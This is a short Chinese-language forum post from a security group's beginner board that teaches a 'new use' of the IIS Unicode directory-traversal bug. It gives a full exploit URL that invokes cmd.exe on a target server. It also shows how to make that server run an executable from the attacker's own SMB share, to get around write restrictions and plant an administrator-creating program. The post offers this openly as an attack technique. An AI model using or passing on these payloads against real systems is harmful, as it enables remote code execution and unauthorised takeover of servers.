|
 | 作者: cyshaoping [cyshaoping]
 论坛用户 |
登录 |
| 这个用法可能有的人已经想到了 不知道大家有没有碰到过这样的网站 scripts有cmd.exe?/c+dir可以用,但是没有任何权限能够copy文件 或tftp任何文件 管理员把整个硬盘的guest的写权限去了 虽然我们手上有创建管理员用户的程序,但是不能上传,也就不能在对方的 服务器上执行了 怎么办? 看看下面这个例子: http://www.xxx.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+\\你的ip\共享目录\filename.exe 呵呵 这样服务器就会访问你的共享目录,然后执行filename.exe了 文件在你的机器上,但是却在服务器端执行,我们的目的达到了:) 最好你的机器是win98或fat32分区的nt 要不然服务器没有任何账号就没办法、读你共享目录下的文件了:) |
| 地主 发表时间: 04/24 17:52 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: unicode新用法